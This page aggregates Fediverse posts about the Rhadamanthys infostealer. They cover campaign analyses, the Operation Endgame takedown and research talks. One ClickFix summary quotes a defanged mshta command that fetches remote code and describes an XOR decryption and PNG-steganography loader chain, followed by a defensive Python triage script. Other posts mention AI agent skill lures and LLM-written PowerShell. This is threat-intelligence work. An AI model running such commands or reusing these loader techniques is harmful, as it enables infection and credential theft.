#rhadamanthys — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #rhadamanthys, aggregated by home.social.
-
GachiLoader adopts AI skill lure
Threat actors are exploiting AI agent skill formats as a novel attack vector, using convincingly packaged OpenClaw skills to distribute malicious payloads. The latest campaign employs pure social engineering, with skills containing no malicious code themselves but instead tricking users into downloading Windows binaries. The attack leverages a fake GitHub infrastructure hosting GachiLoader, which delivers Rhadamanthys infostealer through fileless injection. The operation uses two delivery mechanisms: Node.js Single Executable Applications and an Electron dropper, both converging on the same payload. GachiLoader employs sophisticated evasion techniques including anti-VM checks, sandbox detection, and privilege escalation, while using a Polygon blockchain smart contract as its C2 resolver for enhanced persistence and obfuscation.
Pulse ID: 69f16bcf526f3511990485b6
Pulse Link: https://otx.alienvault.com/pulse/69f16bcf526f3511990485b6
Pulse Author: AlienVault
Created: 2026-04-29 02:24:15
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#BlockChain #CyberSecurity #GitHub #InfoSec #InfoStealer #Nodejs #OTX #OpenThreatExchange #RAT #Rhadamanthys #SMS #SocialEngineering #Windows #bot #AlienVault
-
Watch out as new .NET AOT malware hides its code as a black box, making detection far harder while delivering Rhadamanthys infostealer and crypto miner.
Read: https://hackread.com/net-aot-malware-code-black-box-evade-detection/
-
Join me next week at the @SANSInstitute #CTISummit in Arlington, VA where I'll be presenting on an operation against the infostealer #Rhadamanthys from early in its development.
Register @ https://www.sans.org/u/1CtB
-
I'm speaking at the @SANSInstitute #CTISummit on an operation against #Rhadamanthys years before #OperationEndgame.
-
Oldies are still goodies: It didn't take me long to find a #trojanized pirated TV show #Torrent on a public torrent search engine.
Tell your friends: This is why it's sometimes dangerous to pirate stuff.
The torrent delivers a rar that contains a #Rhadamanthys #infostealer #malware DLL. The package also contains a benign executable that uses the familiar VLC Player traffic-cone icon. It looks like a TV show file, but it's way too small at only 970kb. Double-clicking the benign executable loads the malware DLL.
Rhadamanthys is the same malware family that Europol put out a press release about last month. Maybe it was down for a while, but it seems it's not out --yet.
The bogus torrent leverages strong interest in the streaming TV show Pluribus as its lure.
-
It's been a long time since I've made some, uh, discoveries. But now it happened:
https://www.virustotal.com/gui/file/42a822998ce7c2be43e58dad17d1fcd1675b54f4bb79bbb93522d2442cad80c4
#malware #infostealer #trojan #malicious #unsafe #agent #rhadamanthys
-
🎯 Threat Intelligence
===================
Opening: Huntress documents a multi‑stage ClickFix social engineering campaign that culminates in infostealing malware delivery. The campaign evolves from simple "Human Verification" lures to more convincing fake Windows Update full‑screen prompts that instruct victims to paste and run a command via Win+R. Observed payloads include LummaC2 and Rhadamanthys.
Technical Details: The initial lure auto‑copies a command to the clipboard; a representative command observed was mshta hXXp://81.0x5a.29[.]64/ebc/rps.gz as recorded in the report. The lure page contains an encrypted JavaScript blob (ENC) and a KEY_HEX value; the script implements a small decryption pipeline (hexToKey -> b64ToUint8Array -> xorDecode -> uint8ToUtf8) to reconstruct second‑stage JavaScript. That second stage is injected via an in‑memory Blob URL and revoked after execution. Notably, the final loader does not simply append data to files: the malware encodes the final stages directly into PNG pixel data, leveraging specific color channels to reconstruct and decrypt the payload in memory.
Attack Chain Analysis:
• Initial Access: Social engineering via ClickFix pages disguised as human verification or Windows Update screens.
• Download: Initial fetch using mshta to retrieve compressed/encoded resources from remote hosts.
• Execution: Decrypted JavaScript is injected via Blob URLs and executed in the browser context.
• Loader: Steganographic PNGs deliver encrypted payloads embedded in pixel color channels; payloads are extracted and decrypted in memory.
• Payloads: Infostealers observed include LummaC2 and Rhadamanthys.
Detection: Observable indicators include clipboard manipulation following page visit, mshta fetches to unusual hosts, presence of encrypted ENC/KEY_HEX constructs in page source, Blob URL creation and rapid revocation, and PNG payloads with nonstandard pixel encodings. Huntress highlighted the dynamic loading of encrypted JavaScript as an evasion technique aimed at defeating string‑based detections.
Mitigation: The source report does not provide specific defensive playbooks. Defensive teams should prioritize telemetry that captures mshta network fetches, suspicious Blob URL script injections, and anomalous image decoding activities on endpoints and in browsers.
References and Context: Findings attributed to Huntress; campaign timeline begins in October with observed evolution from basic robot checks to sophisticated Windows Update impersonation.
🔹 steganography #ClickFix #LummaC2 #Rhadamanthys #infostealer
🔗 Source: https://www.huntress.com/blog/clickfix-malware-buried-in-images
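An added example, not code from the Huntress report or the post above: a Python triage helper that replays the hexToKey -> b64ToUint8Array -> xorDecode -> uint8ToUtf8 pipeline named in the post over a captured lure page so the second-stage JavaScript can be read offline, and flags the ENC/KEY_HEX pair and the Blob URL create/revoke pattern listed under Detection. The regexes, function names and the sample page (with a harmless placeholder second stage) are constructed assumptions.

```python
"""Static triage for ClickFix lure pages of the kind described above.

Finds the ENC / KEY_HEX pair in page source, replays the page's own
decryption pipeline (hexToKey -> b64ToUint8Array -> xorDecode -> uint8ToUtf8)
so an analyst can read the second-stage JavaScript, and flags the Blob-URL
create/revoke injection pattern. The sample page below is constructed.
"""
import base64
import re
from typing import Optional

# Source-level indicators named in the report (regexes are assumptions).
ENC_RE = re.compile(r'\b(?:const|let|var)\s+ENC\s*=\s*["\']([A-Za-z0-9+/=]+)["\']')
KEY_RE = re.compile(r'\b(?:const|let|var)\s+KEY_HEX\s*=\s*["\']([0-9a-fA-F]+)["\']')
BLOB_RE = re.compile(r'URL\.createObjectURL\s*\(\s*new\s+Blob\b')
REVOKE_RE = re.compile(r'URL\.revokeObjectURL\s*\(')


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """xorDecode: repeating-key XOR (symmetric, so also used to build the sample)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_second_stage(enc_b64: str, key_hex: str) -> Optional[str]:
    """Replay hexToKey -> b64ToUint8Array -> xorDecode -> uint8ToUtf8.

    Returns None when the key is not hex, is empty, or ENC is not valid base64,
    so a malformed or partially captured page does not crash the triage run.
    """
    try:
        key = bytes.fromhex(key_hex)                      # hexToKey
        blob = base64.b64decode(enc_b64, validate=True)   # b64ToUint8Array
    except ValueError:                                    # binascii.Error is a ValueError
        return None
    if not key:
        return None
    return xor_bytes(blob, key).decode("utf-8", errors="replace")  # uint8ToUtf8


def triage(page_source: str) -> dict:
    """Return the indicators found in one lure page plus the recovered stage."""
    enc = ENC_RE.search(page_source)
    key = KEY_RE.search(page_source)
    result = {
        "has_enc_key_pair": bool(enc and key),
        "blob_url_injection": bool(BLOB_RE.search(page_source)),
        "blob_url_revoked": bool(REVOKE_RE.search(page_source)),
        "second_stage": None,
    }
    if enc and key:
        result["second_stage"] = decode_second_stage(enc.group(1), key.group(1))
    # Encrypted-blob pair plus in-memory Blob script loading is the combination
    # the report describes; either alone is weak evidence on its own.
    result["suspicious"] = result["has_enc_key_pair"] and result["blob_url_injection"]
    return result


# --- constructed sample page (harmless placeholder second stage) -------------
SAMPLE_KEY_HEX = "a1b2c3d4"
SAMPLE_STAGE2 = "console.log('second stage placeholder');"


def build_sample_page() -> str:
    """Build a lure-shaped page using the same pipeline in reverse (constructed)."""
    enc = base64.b64encode(
        xor_bytes(SAMPLE_STAGE2.encode(), bytes.fromhex(SAMPLE_KEY_HEX))
    ).decode()
    return f"""<html><body><div id="check">Human Verification</div>
<script>
const KEY_HEX = "{SAMPLE_KEY_HEX}";
const ENC = "{enc}";
const url = URL.createObjectURL(new Blob([stage2], {{type: "text/javascript"}}));
document.head.appendChild(Object.assign(document.createElement("script"), {{src: url}}));
URL.revokeObjectURL(url);
</script></body></html>"""


if __name__ == "__main__":
    print(triage(build_sample_page()))
```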
-
Fake Windows updates: how the ClickFix attack smuggles malware onto Windows PCs
A new ploy by cybercriminals highlights the danger of fake Windows updates. Under the name ClickFix, attackers lure Windows users with a deceptively realistic update animation displayed in a full-screen browser window. While the image gives the impression that a genuine system update is being installed, hidden behind it is covert malicious code concealed in the pixels of an image.
More: https://maniabel.work/archiv/564
#clickfixphishing #WindowsUpdate #ClickFix #PNGstagnography #LummaC2 #Rhadamanthys #infosec #infosecnews #BeDiS
-
#OperationEndgame3: 1025 servers taken offline | Security https://www.heise.de/news/Operation-Endgame-3-1025-Server-von-Netz-genommen-11077049.html #OperationEndgame #Malware #Infostealer #Botnet #Elysium #VenomRAT #Rhadamanthys
-
Reading tip -> Operation Endgame takes down large cyber networks | In Operation Endgame, large cyber networks have been taken down, with arrests, servers taken offline and the disruption of infostealers, botnets and RATs through international cooperation. | #botnet #cybercrime #Europol #hacking #infostealers #internationalesamenwerking #OperatieEndgame #politie #ransomware #Rhadamanthys #VenomRAT |
https://hbpmedia.nl/operatie-endgame-cybernetwerken-uitgeschakeld/
-
Operation Endgame Hits Rhadamanthys, VenomRAT, Elysium Malware, seize 1025 servers https://hackread.com/operation-endgame-rhadamanthys-venomrat-elysium-malware/ #OperationEndgame #Rhadamanthys #Infostealer #CyberCrime #security #VenomRAT #Malware #Police
-
Operation Endgame Takedown Hits Rhadamanthys and VenomRAT https://dailydarkweb.net/operation-endgame-takedown-hits-rhadamanthys-and-venomrat/ #DarkWebNews&Services #OperationEndgame #Rhadamanthys #infostealer #cybercrime #Eurojust #takedown #VenomRAT #Elysium #Europol #malware #Season3
-
🔥 Operation Endgame 3.0 is here! This phase targets the notorious information and credential stealer #Rhadamanthys. It's another major international effort that’s seen 1,025 servers taken down and 20 domains seized. 💪
👏 Excellent work by @Europol and all partners involved — the takedown of Rhadamanthys marks a significant win for the global cybersecurity community.
As with earlier phases of #OperationEndgame, Spamhaus is providing remediation support. Those affected will be contacted in due course with guidance on next steps.
Operation Endgame website 👉 https://www.operation-endgame.com
Europol press release ⤵️
https://europol.europa.eu/media-press/newsroom/news/end-of-game-for-cybercrime-infrastructure-1025-servers-taken-down
-
#OperationEndgame: Authorities shut down infrastructure for Rhadamanthys Infostealer, VenomRAT and the Elysium botnet, seize 1025 servers and arrest one key suspect.
Read: https://hackread.com/operation-endgame-rhadamanthys-venomrat-elysium-malware/
#CyberCrime #Malware #Rhadamanthys #Infostealer #CyberSecurity
-
1,000+ Servers Hit in Law Enforcement Takedown of Rhadamanthys, VenomRAT, Elysium https://www.securityweek.com/1000-servers-hit-in-law-enforcement-takedown-of-rhadamanthys-venomrat-elysium/ #Tracking&LawEnforcement #lawenforcement #Rhadamanthys #infostealer #takedown #VenomRAT #Elysium #Europol #botnet
-
Operation Endgame’s latest phase targeted the infostealer #Rhadamanthys, Remote Access Trojan #VenomRAT, and the botnet #Elysium.
https://www.europol.europa.eu/media-press/newsroom/news/end-of-game-for-cybercrime-infrastructure-1025-servers-taken-down
-
Operation Endgame Dismantles 1,025 Servers in a Strike Against Rhadamanthys, VenomRAT Operations https://thecyberexpress.com/operation-endgame-dismantle-rhadamanthys/ #ThreatIntelligenceNews #ThreatIntelligence #OperationEndgame #CyberEssentials #ThreatActors #Rhadamanthys #infostealer #CyberNews #VenomRAT
-
And it's out!
End of the game for cybercrime infrastructure: 1025 servers taken down
Between 10 and 13 November 2025, the latest phase of Operation Endgame was coordinated from Europol's headquarters in The Hague. The actions targeted one of the biggest infostealers, Rhadamanthys, the Remote Access Trojan VenomRAT, and the botnet Elysium, all of which played a key role in international cybercrime. Authorities took down these three large cybercrime enablers. The main suspect for VenomRAT was arrested in Greece on 3 November 2025.
#OperationEndgame #rhadamanthys #infostealer #VenomRAT #Elysium
-
Less than 10 minutes left on Operation Endgame's counter. Wonder what they're gonna announce. Maybe just the takedown of Rhadamanthys infostealer infra.
-
"Rumors are spreading about a major #LawEnforcement operation against #Rhadamanthys #Stealer."
🍿 :blobcatpopcorn:
via @Gi7w0rm
-
2025-10-01 (Wednesday) I've posted #malware samples and a #pcap of the post-infection traffic from an infection by possible #Rhadamanthys malware at https://www.malware-traffic-analysis.net/2025/10/01/index.html
This is from a campaign that disguises files as cracked versions of popular software
I usually see #LummaStealer from this, but lately, it's been Rhadamanthys.
-
Leaked Shellter Elite Tool Now Fueling Infostealer Attacks Worldwide https://hackread.com/leaked-shellter-elite-tool-infostealer-attacks-worldwide/ #Cybersecurity #ShellterElite #CyberAttacks #ArechClient2 #Rhadamanthys #CyberAttack #Infostealer #CyberCrime #Security #security #Lumma
-
Leaked Shellter Elite Tool Now Fueling Infostealer Attacks Worldwide – Source:hackread.com https://ciso2ciso.com/leaked-shellter-elite-tool-now-fueling-infostealer-attacks-worldwide-sourcehackread-com/ #1CyberSecurityNewsPost #CyberSecurityNews #cybersecurity #ShellterElite #ArechClient2 #CyberAttacks #Rhadamanthys #CyberAttack #Infostealer #CyberCrime #Hackread #security #Lumma
-
In early 2025, the ClearFake framework widely spread #Emmenhtal Loader as the initial stage, aiming to download #Lumma or #Rhadamanthys, or PowerShell scripts installing #Vidar.
We identified thousands of sites compromised with ClearFake distributing these malware.
-
TA547 Shifts Tactics: Leveraging Rhadamanthys Stealer in German-Specific Campaigns
Date: April 10, 2024
CVE: Not applicable
Vulnerability Type: Information Stealer
CWE: N/A
Sources: Proofpoint
Issue Summary
TA547, a financially motivated cybercriminal group, recently initiated an email campaign targeting German organizations, deploying the Rhadamanthys malware. This marks TA547's first recorded use of Rhadamanthys stealer, an advanced information stealer previously utilized by multiple threat actors. The campaign featured emails impersonating the German retail giant Metro, with malicious attachments designed to execute Rhadamanthys without writing to disk, thereby evading typical file-based detection methods.
Technical Key Findings
The attack chain involves emails with a password-protected ZIP file attachment containing an LNK file. Execution of the LNK file triggers a PowerShell script that decodes and runs the Rhadamanthys stealer directly in memory. Notably, the PowerShell script exhibited signs of being generated by a Large Language Model (LLM), indicative of TA547's potential use of advanced AI tools for crafting malware delivery mechanisms.
Vulnerable products
- Windows platforms targeted via malicious email attachments
Impact assessment
Rhadamanthys stealer is designed to steal sensitive information, including credentials and financial data. Successful deployment within organizations can lead to significant data breaches, financial loss, and reputational damage.
Patches or workaround
While the report does not specify patches, organizations are advised to enhance email filtering, educate employees on phishing, and deploy behavior-based detection mechanisms to mitigate threats posed by memory-resident malware and sophisticated delivery scripts.
Tags
#TA547 #Rhadamanthys #InformationStealer #Germany #Cybercrime #MalwareCampaign #PowerShell #AI_Malware
-
Proofpoint identified financially-motivated TA547 targeting German organizations with an email campaign delivering Rhadamanthys malware. This is the first time researchers observed TA547 use Rhadamanthys, an information stealer that is used by multiple cybercriminal threat actors. Additionally, the actor appeared to use a PowerShell script that researchers suspect was generated by a large language model (LLM) such as ChatGPT, Gemini, CoPilot, etc. IOCs provided. 🔗 https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta547-targets-german-organizations-rhadamanthys-stealer
-
#Rhadamanthys #stealer seems to be having a moment right now. Quick rundown on what we know about infection trends & its post-exploit TTPs
Discovered last summer, it's one of several popular & emerging #infostealer #malware families with new/improved evasion and/or theft capabilities observed in recent months. Like many popular families, Rhadamanthys' initial infections occur via multiple vectors, including #phishing & #spam email attachments and - increasingly - legitimate web search ads: https://www.malware-traffic-analysis.net/2023/01/03/index.html, https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/
In our broad analysis of the infostealer threat landscape, we identified #mitreattack TTPs associated with 16 families across dozens of public reports. We've already added more reported techniques to Rhadamanthys' set since the report dropped this week https://www.tidalcyber.com/blog/big-game-stealing-part-1-the-infostealer-landscape-rising-infostealer-threats-to-businesses-w
Still somewhat limited public reporting on this threat to date, although we've identified 22 (sub-)techniques associated with Rhadamanthys so far. Visualize them and pivot to associated defensive & offensive testing capabilities here: https://app.tidalcyber.com/share/techniqueset/48405ee2-b243-4bda-a6c2-75eb80869056
In addition to the reports above, two other resources here: https://www.accenture.com/us-en/blogs/security/information-stealer-malware-on-dark-web, https://threatmon.io/rhadamanthys-stealer-analysis-threatmon/. Thanks to the teams that published great reporting & analysis around Rhadamanthys so far, including ThreatMon, Accenture, @malware_traffic & Cyble.